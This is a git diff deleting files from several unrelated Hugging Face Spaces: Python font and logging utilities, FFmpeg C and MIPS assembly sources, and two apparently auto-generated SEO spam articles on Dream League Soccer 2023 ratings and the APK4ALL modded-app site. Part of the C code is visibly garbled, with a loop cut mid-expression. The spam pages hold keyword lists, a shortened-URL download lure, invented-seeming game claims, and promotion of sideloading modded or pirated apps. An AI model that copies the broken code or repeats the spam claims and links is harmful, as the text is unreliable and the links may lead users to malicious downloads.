- """ - Convert value from version 3 to version 2 format. - Returns the new attribute name and the converted value. - If the value is None, None will be returned for the new value. - """ - return attr, value - - -def _convertFontInfoDataVersion3ToVersion2(data): - converted = {} - for attr, value in list(data.items()): - newAttr, newValue = convertFontInfoValueForAttributeFromVersion3ToVersion2( - attr, value - ) - if newAttr not in fontInfoAttributesVersion2: - continue - converted[newAttr] = newValue - return converted - - -def _convertFontInfoDataVersion2ToVersion3(data): - converted = {} - for attr, value in list(data.items()): - attr, value = convertFontInfoValueForAttributeFromVersion2ToVersion3( - attr, value - ) - converted[attr] = value - return converted - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py b/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py deleted file mode 100644 index 18145f54c927abd59b95f3fa6e6da8002bc2ce97..0000000000000000000000000000000000000000 --- a/spaces/codelion/Grounding_DINO_demo/groundingdino/util/logger.py +++ /dev/null @@ -1,93 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved -import functools -import logging -import os -import sys - -from termcolor import colored - - -class _ColorfulFormatter(logging.Formatter): - def __init__(self, *args, **kwargs): - self._root_name = kwargs.pop("root_name") + "." - self._abbrev_name = kwargs.pop("abbrev_name", "") - if len(self._abbrev_name): - self._abbrev_name = self._abbrev_name + "." - super(_ColorfulFormatter, self).__init__(*args, **kwargs) - - def formatMessage(self, record): - record.name = record.name.replace(self._root_name, self._abbrev_name) - log = super(_ColorfulFormatter, self).formatMessage(record) - if record.levelno == logging.WARNING: - prefix = colored("WARNING", "red", attrs=["blink"]) - elif record.levelno == logging.ERROR or record.levelno == logging.CRITICAL: - prefix = colored("ERROR", "red", attrs=["blink", "underline"]) - else: - return log - return prefix + " " + log - - -# so that calling setup_logger multiple times won't add many handlers -@functools.lru_cache() -def setup_logger(output=None, distributed_rank=0, *, color=True, name="imagenet", abbrev_name=None): - """ - Initialize the detectron2 logger and set its verbosity level to "INFO". - - Args: - output (str): a file name or a directory to save log. If None, will not save log file. - If ends with ".txt" or ".log", assumed to be a file name. - Otherwise, logs will be saved to `output/log.txt`. - name (str): the root module name of this logger - - Returns: - logging.Logger: a logger - """ - logger = logging.getLogger(name) - logger.setLevel(logging.DEBUG) - logger.propagate = False - - if abbrev_name is None: - abbrev_name = name - - plain_formatter = logging.Formatter( - "[%(asctime)s.%(msecs)03d]: %(message)s", datefmt="%m/%d %H:%M:%S" - ) - # stdout logging: master only - if distributed_rank == 0: - ch = logging.StreamHandler(stream=sys.stdout) - ch.setLevel(logging.DEBUG) - if color: - formatter = _ColorfulFormatter( - colored("[%(asctime)s.%(msecs)03d]: ", "green") + "%(message)s", - datefmt="%m/%d %H:%M:%S", - root_name=name, - abbrev_name=str(abbrev_name), - ) - else: - formatter = plain_formatter - ch.setFormatter(formatter) - logger.addHandler(ch) - - # file logging: all workers - if output is not None: - if output.endswith(".txt") or output.endswith(".log"): - filename = output - else: - filename = os.path.join(output, "log.txt") - if distributed_rank > 0: - filename = filename + f".rank{distributed_rank}" - os.makedirs(os.path.dirname(filename), exist_ok=True) - - fh = logging.StreamHandler(_cached_log_stream(filename)) - fh.setLevel(logging.DEBUG) - fh.setFormatter(plain_formatter) - logger.addHandler(fh) - - return logger - - -# cache the opened file object, so that different calls to `setup_logger` -# with the same file name can safely write to the same file. -@functools.lru_cache(maxsize=None) -def _cached_log_stream(filename): - return open(filename, "a") diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c deleted file mode 100644 index 0600bc6e507967ab8f77cd8d25d37d4b57d61e8c..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/arm/blockdsp_init_neon.c +++ /dev/null @@ -1,35 +0,0 @@ -/* - * ARM NEON optimised block operations - * Copyright (c) 2008 Mans Rullgard - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include - -#include "libavutil/attributes.h" -#include "libavcodec/blockdsp.h" -#include "blockdsp_arm.h" - -void ff_clear_block_neon(int16_t *block); -void ff_clear_blocks_neon(int16_t *blocks); - -av_cold void ff_blockdsp_init_neon(BlockDSPContext *c) -{ - c->clear_block = ff_clear_block_neon; - c->clear_blocks = ff_clear_blocks_neon; -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c deleted file mode 100644 index d889e61aca037c4994edf648bda8aa14d5c3412e..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/fmtconvert.c +++ /dev/null @@ -1,63 +0,0 @@ -/* - * Format Conversion Utils - * Copyright (c) 2000, 2001 Fabrice Bellard - * Copyright (c) 2002-2004 Michael Niedermayer - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#include "config.h" -#include "libavutil/attributes.h" -#include "fmtconvert.h" - -static void int32_to_float_fmul_scalar_c(float *dst, const int32_t *src, - float mul, int len) -{ - int i; - for(i=0; iint32_to_float_fmul_scalar(&dst[i], &src[i], *mul++, 8); -} - -av_cold void ff_fmt_convert_init(FmtConvertContext *c) -{ - c->int32_to_float_fmul_scalar = int32_to_float_fmul_scalar_c; - c->int32_to_float_fmul_array8 = int32_to_float_fmul_array8_c; - -#if ARCH_AARCH64 - ff_fmt_convert_init_aarch64(c); -#elif ARCH_ARM - ff_fmt_convert_init_arm(c); -#elif ARCH_PPC - ff_fmt_convert_init_ppc(c); -#elif ARCH_RISCV - ff_fmt_convert_init_riscv(c); -#elif ARCH_X86 - ff_fmt_convert_init_x86(c); -#endif -#if HAVE_MIPSFPU - ff_fmt_convert_init_mips(c); -#endif -} diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c deleted file mode 100644 index 3d3d3a554828a9272ea6badb0cfba09e45644d86..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mdct_float.c +++ /dev/null @@ -1,20 +0,0 @@ -/* - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -#define FFT_FLOAT 1 -#include "mdct_template.c" diff --git a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h b/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h deleted file mode 100644 index 633eb9589d8ca214325c31e4e1e1958f66a256f6..0000000000000000000000000000000000000000 --- a/spaces/colakin/video-generater/public/ffmpeg/libavcodec/mips/compute_antialias_float.h +++ /dev/null @@ -1,186 +0,0 @@ -/* - * Copyright (c) 2012 - * MIPS Technologies, Inc., California. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions - * are met: - * 1. Redistributions of source code must retain the above copyright - * notice, this list of conditions and the following disclaimer. - * 2. Redistributions in binary form must reproduce the above copyright - * notice, this list of conditions and the following disclaimer in the - * documentation and/or other materials provided with the distribution. - * 3. Neither the name of the MIPS Technologies, Inc., nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE MIPS TECHNOLOGIES, INC. ``AS IS'' AND - * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - * ARE DISCLAIMED. IN NO EVENT SHALL THE MIPS TECHNOLOGIES, INC. BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - * SUCH DAMAGE. - * - * Author: Bojan Zivkovic (bojan@mips.com) - * - * Compute antialias function optimised for MIPS floating-point architecture - * - * This file is part of FFmpeg. - * - * FFmpeg is free software; you can redistribute it and/or - * modify it under the terms of the GNU Lesser General Public - * License as published by the Free Software Foundation; either - * version 2.1 of the License, or (at your option) any later version. - * - * FFmpeg is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * Lesser General Public License for more details. - * - * You should have received a copy of the GNU Lesser General Public - * License along with FFmpeg; if not, write to the Free Software - * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - */ - -/** - * @file - * Reference: libavcodec/mpegaudiodec.c - */ - -#ifndef AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H -#define AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H - -#include "libavutil/mips/asmdefs.h" - -#if HAVE_INLINE_ASM -#if !HAVE_MIPS32R6 && !HAVE_MIPS64R6 -static void compute_antialias_mips_float(MPADecodeContext *s, - GranuleDef *g) -{ - float *ptr, *ptr_end; - const float *csa = &csa_table[0][0]; - /* temporary variables */ - float in1, in2, in3, in4, in5, in6, in7, in8; - float out1, out2, out3, out4; - - ptr = g->sb_hybrid + 18; - /* we antialias only "long" bands */ - if (g->block_type == 2) { - if (!g->switch_point) - return; - /* XXX: check this for 8000Hz case */ - ptr_end = ptr + 18; - } else { - ptr_end = ptr + 558; - } - - /** - * instructions are scheduled to minimize pipeline stall. - */ - - __asm__ volatile ( - "compute_antialias_float_loop%=: \t\n" - "lwc1 %[in1], -1*4(%[ptr]) \t\n" - "lwc1 %[in2], 0(%[csa]) \t\n" - "lwc1 %[in3], 1*4(%[csa]) \t\n" - "lwc1 %[in4], 0(%[ptr]) \t\n" - "lwc1 %[in5], -2*4(%[ptr]) \t\n" - "lwc1 %[in6], 4*4(%[csa]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in7], 5*4(%[csa]) \t\n" - "lwc1 %[in8], 1*4(%[ptr]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "lwc1 %[in1], -3*4(%[ptr]) \t\n" - "swc1 %[out1], -1*4(%[ptr]) \t\n" - "swc1 %[out2], 0(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 8*4(%[csa]) \t\n" - "swc1 %[out3], -2*4(%[ptr]) \t\n" - "swc1 %[out4], 1*4(%[ptr]) \t\n" - "lwc1 %[in3], 9*4(%[csa]) \t\n" - "lwc1 %[in4], 2*4(%[ptr]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "lwc1 %[in5], -4*4(%[ptr]) \t\n" - "lwc1 %[in6], 12*4(%[csa]) \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in7], 13*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "lwc1 %[in8], 3*4(%[ptr]) \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -3*4(%[ptr]) \t\n" - "lwc1 %[in1], -5*4(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "swc1 %[out2], 2*4(%[ptr]) \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 16*4(%[csa]) \t\n" - "lwc1 %[in3], 17*4(%[csa]) \t\n" - "swc1 %[out3], -4*4(%[ptr]) \t\n" - "lwc1 %[in4], 4*4(%[ptr]) \t\n" - "swc1 %[out4], 3*4(%[ptr]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in5], -6*4(%[ptr]) \t\n" - "lwc1 %[in6], 20*4(%[csa]) \t\n" - "lwc1 %[in7], 21*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "lwc1 %[in8], 5*4(%[ptr]) \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -5*4(%[ptr]) \t\n" - "swc1 %[out2], 4*4(%[ptr]) \t\n" - "lwc1 %[in1], -7*4(%[ptr]) \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "lwc1 %[in2], 24*4(%[csa]) \t\n" - "lwc1 %[in3], 25*4(%[csa]) \t\n" - "lwc1 %[in4], 6*4(%[ptr]) \t\n" - "swc1 %[out3], -6*4(%[ptr]) \t\n" - "swc1 %[out4], 5*4(%[ptr]) \t\n" - "mul.s %[out1], %[in1], %[in2] \t\n" - "lwc1 %[in5], -8*4(%[ptr]) \t\n" - "mul.s %[out2], %[in1], %[in3] \t\n" - "lwc1 %[in6], 28*4(%[csa]) \t\n" - "lwc1 %[in7], 29*4(%[csa]) \t\n" - "nmsub.s %[out1], %[out1], %[in3], %[in4] \t\n" - "lwc1 %[in8], 7*4(%[ptr]) \t\n" - "madd.s %[out2], %[out2], %[in2], %[in4] \t\n" - "mul.s %[out3], %[in5], %[in6] \t\n" - "mul.s %[out4], %[in5], %[in7] \t\n" - "swc1 %[out1], -7*4(%[ptr]) \t\n" - "swc1 %[out2], 6*4(%[ptr]) \t\n" - PTR_ADDIU "%[ptr],%[ptr], 72 \t\n" - "nmsub.s %[out3], %[out3], %[in7], %[in8] \t\n" - "madd.s %[out4], %[out4], %[in6], %[in8] \t\n" - "swc1 %[out3], -26*4(%[ptr]) \t\n" - "swc1 %[out4], -11*4(%[ptr]) \t\n" - "bne %[ptr], %[ptr_end], compute_antialias_float_loop%= \t\n" - - : [ptr] "+r" (ptr), - [in1] "=&f" (in1), [in2] "=&f" (in2), - [in3] "=&f" (in3), [in4] "=&f" (in4), - [in5] "=&f" (in5), [in6] "=&f" (in6), - [in7] "=&f" (in7), [in8] "=&f" (in8), - [out1] "=&f" (out1), [out2] "=&f" (out2), - [out3] "=&f" (out3), [out4] "=&f" (out4) - : [csa] "r" (csa), [ptr_end] "r" (ptr_end) - : "memory" - ); -} -#define compute_antialias compute_antialias_mips_float -#endif /* !HAVE_MIPS32R6 && !HAVE_MIPS64R6 */ -#endif /* HAVE_INLINE_ASM */ - -#endif /* AVCODEC_MIPS_COMPUTE_ANTIALIAS_FLOAT_H */ diff --git a/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md b/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md deleted file mode 100644 index 1cee66812725fb970bb93942bec6e956fe913310..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/DLS 23 Player Ratings Who are the Best and Worst Legends Rares and Commons?.md +++ /dev/null @@ -1,116 +0,0 @@ -
      -

      DLS 2023 Player Ratings: How to Build Your Dream Team

      -

      If you are a fan of soccer games, you might have heard of Dream League Soccer 2023, or DLS 2023 for short. This is one of the most popular and realistic soccer games on mobile devices, with over 100 million downloads on Google Play Store and App Store. In this article, we will show you how to use player ratings to build your dream team in DLS 2023, as well as how to play the game and win matches. Let's get started!

      -

      dls 2023 player ratings


      Download File ✯✯✯ https://urlca.com/2uOfvj



      -

      Introduction

      -

      What is DLS 2023 and why is it popular?

      -

      Dream League Soccer 2023 is a soccer simulation game developed by First Touch Games, a UK-based studio that specializes in sports games. The game allows you to create and manage your own soccer club, from signing players and upgrading facilities, to playing matches and competing in tournaments. You can choose from over 4,000 FIFPRO™ licensed players, including superstars like Kevin De Bruyne, Achraf Hakimi, Lionel Messi, Cristiano Ronaldo, Kylian Mbappe, Robert Lewandowski, and more . You can also customize your team's kit, logo, and formation, as well as import your own creations.

      -

      One of the reasons why DLS 2023 is so popular is because of its realistic and immersive gameplay. The game features full 3D motion-captured kicks, tackles, celebrations, and goalkeeper saves, as well as immersive and exciting match commentary. The game also uses improved AI to make the matches more challenging and fun. Moreover, the game has a Dream League Live mode that lets you play against other players from across the globe in real-time . You can also take part in regular seasons and events to win unrivalled rewards.

      -

      What are player ratings and why are they important?

      -

      Player ratings are numerical values that indicate how good a player is in different aspects of the game. Each player has an overall rating (OVR) that ranges from 1 to 100, as well as ratings for six attributes: speed (SPE), shooting (SHO), passing (PAS), dribbling (DRI), strength (STR), and defending (DEF). The higher the rating, the better the player performs on the field.

      -

      dls 23 player ratings database
      -dls 23 legendary player cards
      -dls 23 best players of all ages
      -dls 23 player stats update
      -dls 23 top 30 best players
      -dls 23 hakimi stats
      -dls 23 theo hernandez stats
      -dls 23 neymar footedness
      -dls 23 messi speed
      -dls 23 haaland card
      -dls 23 mbappe card
      -dls 23 ronaldo card
      -dls 23 lewandowski card
      -dls 23 marquinhos card
      -dls 23 ruben dias rating
      -dls 23 new card design
      -dls 23 hd graphics mod
      -dls 23 transfers update
      -dls 23 stamina challenge
      -dls 23 r2g series
      -dls 23 pro max coins
      -dls 23 secret players list
      -dls 23 golden legendary players
      -dls 23 diamond players upgrade
      -dls 23 jersey number points
      -dls 23 wwe tag team match
      -dls 23 wheel picks teammates
      -dls 23 messi giant diamond
      -dls 23 mbappe hates neymar and messi
      -dls 23 messi embarrassing the league

      -

      Player ratings are important because they affect how your team plays and how you can win matches. For example, if you have a player with high speed rating, he can run faster than other players and create more chances for scoring or assisting. If you have a player with high shooting rating, he can shoot more accurately and powerfully than other players and score more goals. If you have a player with high defending rating, he can tackle more effectively and prevent your opponents from scoring.

      -

      Therefore, it is essential to pay attention to player ratings when building your dream team

      How to find the best players for your team

      -

      Use the DLS 23 Players Database to compare stats and ratings

      -

      One of the easiest ways to find the best players for your team is to use the DLS 23 Players Database, a website that provides detailed information about all the players in the game. You can search for players by name, position, nationality, club, league, or rating. You can also sort and filter the results by various criteria, such as OVR, SPE, SHO, PAS, DRI, STR, or DEF. You can also view the player's profile, which shows his age, height, weight, preferred foot, and skills.

      -

      The DLS 23 Players Database is a useful tool to compare different players and see their strengths and weaknesses. For example, you can compare Messi and Ronaldo and see who has higher ratings in different attributes. You can also compare players from different leagues and see who are the best in each category. You can also find hidden gems and underrated players who have high potential and low cost.

      -

      Use Agents and Scouts to discover new talent in the transfer market

      -

      Another way to find the best players for your team is to use Agents and Scouts, two features that allow you to discover new talent in the transfer market. Agents are special cards that you can use to sign random players from a specific category, such as Gold, Silver, or Bronze. The higher the category, the higher the chance of getting a high-rated player. You can get Agents by completing achievements, participating in events, or purchasing them with coins or diamonds .

      -

      Scouts are special cards that you can use to sign specific players from a certain region, league, club, or position. For example, you can use a Scout that targets Europe, Premier League, Manchester City, or Striker. The higher the specificity, the higher the cost of the Scout. You can get Scouts by playing matches, winning tournaments, or purchasing them with coins or diamonds .

      -

      Agents and Scouts are great ways to find new players for your team that match your preferences and budget. You can also use them to fill gaps in your squad or to replace players who are injured or out of form.

      -

      Use Coaches to improve your players' abilities and skills

      -

      A third way to find the best players for your team is to use Coaches, a feature that allows you to improve your players' abilities and skills. Coaches are special cards that you can use to increase your players' OVR or specific attributes by a certain amount. For example, you can use a Coach that boosts your player's OVR by 5 points or his SHO by 10 points. You can get Coaches by completing achievements, participating in events, or purchasing them with coins or diamonds .

      -

      Coaches are useful to enhance your players' performance and potential. You can use them to upgrade your existing players or to train new players who have low ratings but high potential. You can also use them to balance your team's attributes and make them more versatile and adaptable.

      -

      How to play DLS 2023 and win matches

      -

      Learn the basics of the gameplay and controls

      -

      To play DLS 2023 and win matches, you need to learn the basics of the gameplay and controls. The game has two modes: Classic and Casual. In Classic mode, you control your team using a virtual joystick and three buttons: A for passing and tackling, B for shooting and sliding, and C for crossing and switching players. In Casual mode, you control your team using simple taps and swipes on the screen . You can choose the mode that suits your preference and skill level.

      -

      The game also has four difficulty levels: Easy, Medium, Hard, and Legendary. The higher the difficulty level, the more challenging and realistic the matches are. You can choose the difficulty level that matches your ability and goal. You can also adjust other settings such as match duration, camera angle, sound effects, and graphics quality .

      -

      Customize your team's kit, logo, and formation

      -

      To play DLS 2023 and win matches , you need to customize your team's kit, logo, and formation. The game allows you to choose from a variety of kits and logos that are based on real-life soccer clubs, such as Barcelona, Liverpool, Juventus, PSG, and more . You can also import your own kit and logo from the internet or create your own using the in-game editor. You can also change the color and style of your kit and logo to suit your taste.

      -

      The game also allows you to choose from different formations that affect how your team plays and performs. You can choose from 4-4-2, 4-3-3, 3-5-2, 5-3-2, and more. You can also customize the positions and roles of your players, such as striker, winger, midfielder, defender, or goalkeeper. You can also assign different tactics and strategies to your team, such as attacking, defending, counter-attacking, or possession. You can also change the formation and tactics during the match to adapt to different situations.

      -

      Use Dream League Live mode to compete against other players online

      -

      To play DLS 2023 and win matches, you need to use Dream League Live mode to compete against other players online. This is a mode that lets you play against other players from across the globe in real-time . You can choose from different divisions and leagues that match your skill level and rank. You can also join or create clubs with other players and participate in club tournaments and events. You can also chat with other players and make friends or rivals.

      -

      Dream League Live mode is a fun and exciting way to test your skills and abilities against other players. You can also earn coins and diamonds by winning matches and climbing the leaderboards. You can also unlock exclusive rewards and achievements by completing challenges and milestones. You can also showcase your team's kit, logo, and formation to other players and impress them with your style.

      -

      Conclusion

      -

      Summarize the main points of the article

      -

      In conclusion, DLS 2023 is a soccer simulation game that lets you create and manage your own soccer club. You can use player ratings to build your dream team by finding the best players for your team, improving their abilities and skills, and customizing their kit, logo, and formation. You can also play DLS 2023 and win matches by learning the basics of the gameplay and controls, and competing against other players online in Dream League Live mode.

      -

      Provide some tips and tricks for DLS 2023 players

      -

      Here are some tips and tricks for DLS 2023 players that can help you improve your game and have more fun:

      -
        -
      • Use the DLS 23 Players Database to find out the ratings and stats of all the players in the game. You can also use it to compare different players and see who are the best in each category.
      • -
      • Use Agents and Scouts to discover new talent in the transfer market. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds .
      • -
      • Use Coaches to improve your players' abilities and skills. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds .
      • -
      • Customize your team's kit, logo, and formation to suit your preference and style. You can also import your own kit and logo from the internet or create your own using the in-game editor.
      • -
      • Choose the right formation and tactics for your team based on their strengths and weaknesses. You can also change them during the match to adapt to different situations.
      • -
      • Use Dream League Live mode to compete against other players online in real-time. You can earn coins and diamonds by winning matches and climbing the leaderboards. You can also unlock exclusive rewards and achievements by completing challenges and milestones.
      • -
      • Have fun and enjoy the game!
      • -
      -

      FAQs

      -

      What are the minimum requirements to play DLS 2023?

      -

      The minimum requirements to play DLS 2023 are as follows:

      -
        -
      • Android: OS version 5.0 or higher; RAM 1 GB or higher; free storage space 500 MB or higher
      • -
      • iOS: OS version 10.0 or higher; compatible with iPhone 5S or newer; free storage space 500 MB or higher
      • -
      -

      How can I get more coins and diamonds in DLS 2023?

      -

      You can get more coins and diamonds in DLS 2023 by doing the following:

      -
        -
      • Winning matches
      • Participating in events and tournaments
      • -
      • Completing achievements and milestones
      • -
      • Watching video ads
      • -
      • Purchasing them with real money
      • -
      -

      How can I import my own kit and logo in DLS 2023?

      -

      You can import your own kit and logo in DLS 2023 by following these steps:

      -
        -
      1. Find or create your own kit and logo on the internet. Make sure they are in PNG format and have the right dimensions. For kit, the dimensions are 512 x 512 pixels. For logo, the dimensions are 256 x 256 pixels.
      2. -
      3. Copy the URL of your kit and logo. You can use a URL shortener service to make it easier.
      4. -
      5. Open the game and go to My Club > Customize Team > Edit Kit or Edit Logo.
      6. -
      7. Tap on the Download button and paste the URL of your kit or logo.
      8. -
      9. Tap on Confirm and enjoy your new kit or logo.
      10. -
      -

      How can I unlock legendary players in DLS 2023?

      -

      You can unlock legendary players in DLS 2023 by doing the following:

      -
        -
      • Playing matches and earning XP points. The more XP points you have, the higher your level is. You can unlock legendary players at certain levels, such as level 10, 20, 30, and so on.
      • -
      • Using Agents or Scouts that target legendary players. You can get them by completing achievements, participating in events, or purchasing them with coins or diamonds .
      • -
      • Purchasing them with real money. You can buy legendary players from the Shop using real money. However, this is not recommended as it can be expensive and unfair.
      • -
      -

      How can I update DLS 2023 to get the latest features and players?

      -

      You can update DLS 2023 to get the latest features and players by doing the following:

      -
        -
      • Checking for updates regularly on Google Play Store or App Store. You can also enable automatic updates to get them as soon as they are available.
      • -
      • Following the official social media accounts of DLS 2023 on Facebook, Twitter, Instagram, YouTube, and TikTok. You can also join the official Discord server to get the latest news and updates.
      • -
      • Giving feedback and suggestions to the developers of DLS 2023. You can contact them via email at support@ftgames.com or via the in-game Help & Support section.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md b/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md deleted file mode 100644 index 159b953f2318fb4c4c90ed5b0bd1630d4e9a2d84..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Download APK4All The Trusted Source for Android APK Downloads.md +++ /dev/null @@ -1,101 +0,0 @@ - -

      Download APK4ALL: A Guide for Android Users

      -

      If you are an Android user who loves to explore new apps and games on your device, you may have heard of APK4ALL. It is a website that offers thousands of modded and premium apps for Android devices.

      -

      But what is APK 4ALL and how can you use it to download and install amazing apps on your device? In this article, we will answer these questions and more. We will also discuss the benefits, risks, and alternatives of using APK4ALL. So, let's get started!

      -

      download apk4all


      Download Zip ::: https://urlca.com/2uO4Un



      -

      What is APK4ALL?

      -

      APK4ALL is a website that offers thousands of modded and premium apps for Android devices. Modded apps are apps that have been modified or hacked to provide users with extra features or functions that are not available in the original version. Premium apps are apps that require users to pay a fee or subscription to access them.

      -

      APK4ALL provides users with safe, virus-free, and updated APK files that can be downloaded and installed easily. APK files are the installation files for Android apps, similar to EXE files for Windows programs. APK4ALL has a variety of categories, such as games, tools, entertainment, education, and more. Users can browse the apps by category or search for the app they want.

      -

      Why use APK4ALL?

      -

      APK4ALL has many benefits for Android users who want to enjoy more features and functions on their devices. Here are some of the reasons why you should use APK4ALL:

      -
        -
      • Access apps that are not available on the Google Play Store: Some apps may be geo-restricted, adult, or removed from the Google Play Store for various reasons. APK4ALL allows users to access these apps without any hassle.
      • -
      • Download modded apps that have unlocked or unlimited features: Some apps may have limited features or functions that require users to pay or watch ads to unlock them. APK4ALL lets users download modded apps that have unlocked or unlimited features, such as coins, gems, lives, etc.
      • -
      • Save money by offering premium apps for free or at a discounted price: Some apps may be too expensive or require a subscription to use them. APK4ALL saves users money by offering premium apps for free or at a discounted price.
      • -
      -

      How to download APK4ALL?

      -

      Downloading APK4ALL is easy and fast. Users just need to follow these simple steps:

      -
        -
      1. Step 1: Go to the official website of APK4ALL () and browse the apps by category or search for the app you want.
      2. -
      3. Step 2: Click on the app you want to download and read the description, screenshots, and user reviews.
      4. -
      5. Step 3: Click on the download button and choose the version you want to download. You can also scan the QR code to download the app directly to your device.
      6. -
      7. Step 4: After the download is complete, locate the APK file on your device and tap on it to install it. You may need to enable unknown sources in your settings to allow the installation.
      8. -
      -

      What are the risks of using APK4ALL?

      -

      Although APK4ALL claims to be safe and reliable, there are some risks involved in using any third-party app store. Users should be aware of these risks and take precautions to avoid them. Here are some of the risks of using APK4ALL:

      -
        -
